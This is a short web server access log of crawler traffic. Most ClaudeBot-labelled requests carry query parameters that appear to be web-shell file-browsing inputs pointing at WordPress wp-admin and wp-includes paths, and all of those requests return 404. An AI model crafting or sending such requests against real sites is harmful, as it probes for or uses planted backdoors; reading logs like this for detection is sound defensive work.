216.73.216.117 - - [21/Jul/2026:14:06:48 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Ffont-library.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 2007 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:06:51 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fprivacy.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 2629 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:14:06:52 +0000] "GET /detail/6292961692 HTTP/1.1" 200 30332 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:14:06:54 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fimport.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 4365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:14:06:57 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fimport.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 4365 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.68.247.217 - - [21/Jul/2026:14:06:57 +0000] "GET /items/B395205107/ HTTP/2" 404 3164 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:14:07:00 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fhttp.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 7324 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
